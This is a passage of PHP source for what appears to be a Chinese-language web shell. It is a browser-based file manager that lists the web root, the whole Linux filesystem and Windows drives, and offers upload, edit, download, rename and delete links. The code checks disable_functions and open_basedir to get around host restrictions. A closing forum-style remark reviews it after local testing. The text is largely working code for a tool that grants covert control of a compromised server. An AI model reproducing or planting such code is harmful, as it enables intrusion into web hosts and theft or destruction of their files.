"php参数",
KING_SELF . "?action=phpinfo",
'action_del'),
array(
"phpinfo",
KING_SELF . "?action=viewinfo",
null),
array(
"mysql管理(需付费购买)",
'javascript:;;;',
'pay'),
$restart,
);
if (isset($unset)) {
array_pop($menus);
}
foreach ($menus as $menu) {
$return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]);
}
return $return;
}
protected function action() {
$menus = array(
array(
"网站目录",
KING_SELF . "?action=view&file=" . $this->webroot(),
'action_del'),
array(
"文件目录",
KING_SELF . "?action=view&file=" . $this->scriptroot(),
'action_del'),
array(
"上传文件",
'javascript:;;;',
'upload'),
array(
"新建文件",
"javascript:;;;",
'_newfile'),
array(
"新建文件夹",
"javascript:;;;",
'_newfolder'),
array(
"打包当前路径(php功能)",
KING_SELF . "?action=packages",
'action_del packages'),
array(
"打包当前路径(linux功能)",
KING_SELF . "?action=linuxpkg",
'action_del packages'),
array(
"刷新本页",
KING_SELF . "?action=view&file=" . bin2hex($_SESSION['dirpath']),
'action_del'),
);
foreach ($menus as $menu) {
$return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]);
}
return $return;
}
protected function showfile($path = null) {
$pathname = empty($path) ? $this->basedir() : pack('H*', $path);
$filename = $this->scandir($pathname);
if (isset($filename['dirs'])) {
sort($filename['dirs']);
foreach ($filename['dirs'] as $key => $value) {
$basefile = $this->mbstring($pathname) . '/' . $value;
$dirs[$key] = str_replace(array(
'{self}',
'{file}',
'{return_file}',
'{return_time}',
'{return_size}',
'{return_chmod}',
'{return_perms}',
'{is_folder}',
), array(
KING_SELF,
bin2hex($basefile), //1
$value,
date('Y-m-d H:i:s', $this->filemtime($basefile)),
'无',
substr(sprintf('%o', $this->fileperms($basefile)), -4),
$this->perms($basefile),
sprintf('<a class="action_del" href="%s?action=rename&file=%s">重命名</a> | ',KING_SELF,bin2hex($basefile)).
sprintf('<a class="action_del" href="%s?action=rmdir&file=%s">删除</a>',KING_SELF,bin2hex($basefile)),
), show_html());
}
unset($key, $value, $basefile);
}
if (isset($filename['files'])) {
sort($filename['files']);
foreach ($filename['files'] as $key => $value) {
$basefile = $this->mbstring($pathname) . '/' . $value;
$color = ($key + 1) % 2 ? 'dd' : 'fff';
$files[$key] = str_replace(array(
'{self}',
'{file}',
'{return_file}',
'{return_time}',
'{return_size}',
'{return_chmod}',
'{return_perms}',
'{is_folder}',
'{.red}'), array(
KING_SELF,
bin2hex($basefile),
$value, //1
date('Y-m-d H:i:s', $this->filemtime($basefile)),
$this->byte_format($this->filesize($basefile)),
substr(sprintf('%o', $this->fileperms($basefile)), -4),
$this->perms($basefile),
sprintf('<a href="%s?action=down&file=%s">下载</a> | ', KING_SELF, bin2hex($basefile)) .
sprintf('<a class="action_del" href="%s?action=editfile&file=%s">编辑</a>',KING_SELF,bin2hex($basefile)). ' | <a href="">重命名</a> | ' . sprintf(' <a class="action_del" href="%s?action=del&file=%s">删除</a>', KING_SELF, bin2hex($basefile)),
($value == KING_SELF) ? 'red' : null,
), show_html());
}
}
if (!isset($dirs))
$dirs = array();
if (!isset($files))
$files = array();
$arr = array_merge($dirs, $files);
foreach ($arr as $k => $v) {
$color = ($k + 1) % 2 ? 'fff' : 'dd';
$res[] = str_replace(array('{color}'), array($color), $v);
}
return join(null, $res);
}
function webroot() {
return bin2hex(str_replace('\\', '/', $_SERVER["DOCUMENT_ROOT"]));
}
function scriptroot() {
return bin2hex(str_replace('\\', '/', dirname($_SERVER["SCRIPT_FILENAME"])));
}
protected function filemtime($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
return filemtime($path);
}
protected function fileperms($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
return fileperms($path);
}
protected function filesize($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
return filesize($path);
}
protected function perms($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
$perms = fileperms($path);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = '?????????';
return $info;
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms &
0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms &
0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms &
0x0200) ? 'T' : '-'));
return $info;
}
protected function setpath($path) {
$_SESSION['dirpath'] = $path;
return $path;
}
protected function current_dir() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
return $this->dirpath($path);
}
protected function basedir() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : str_replace('\\', '/', dirname(__file__));
$this->setpath($path);
return $path;
}
protected function all_dir() {
if (!IS_WIN) {
return $this->scanlinux();
} else {
return $this->scanwindows();
}
}
protected function scanlinux() {
if (ini_get('open_basedir'))
return;
$pathname = '/';
return $this->scandir($pathname, true);
}
protected function scanwindows() {
$range = range('A', 'Z');
foreach ($range as $dir) {
if (is_dir(sprintf('%s:', $dir))) {
$dirs[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex($dir . ':'), $dir);
}
}
return join(' | ', $dirs);
}
protected function scandir($path, $dir = false) {
if ($dir == true && !strpos(ini_get('disable_functions'), 'scandir')) {
$class = scandir($path);
foreach ($class as $key => $fileinfo) {
if ($fileinfo == '.' || $fileinfo == '..')
continue;
if (is_dir($path . '/' . $fileinfo)) {
$files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo)), str_replace('\\', '/', $fileinfo));
}
}
return join(' | ', $files);
}
//先采用scandir扫描
if (!strpos(ini_get('disable_functions'), 'scandir')) {
$root = scandir($path);
foreach ($root as $key => $value) {
if ($value == '.' || $value == '..')
continue;
if (is_dir($path . '/' . $value)) {
$dirs[] = $this->mbstring(str_replace('\\', '/', $value));
}
if (is_file($path . '/' . $value)) {
$files[] = $this->mbstring(str_replace('\\', '/', $value));
}
}
return array('dirs' => $dirs, 'files' => $files);
}
$class = new DirectoryIterator($path);
if ($dir == true) {
foreach ($class as $key => $fileinfo) {
if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
continue;
if ($fileinfo->isDir()) {
$files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo->getFilename())), str_replace('\\', '/', $fileinfo->getFilename()));
}
}
return join(' | ', $files);
}
foreach ($class as $key => $fileinfo) {
if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
continue;
if ($fileinfo->isFile()) {
$files[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename()));
}
if ($fileinfo->isDir()) {
$dirs[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename()));
}
}
return array('dirs' => $dirs, 'files' => $files);
}
protected function space_total() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : dirname(__file__);
$dis = explode(',', ini_get('disable_functions'));
if (in_array('disk_total_space', $dis)) {
return '0B';
}
return $this->byte_format(disk_total_space($path));
}
//拆解当前路径
本地测试后发现功能,点评下,功能太尼玛简单咯
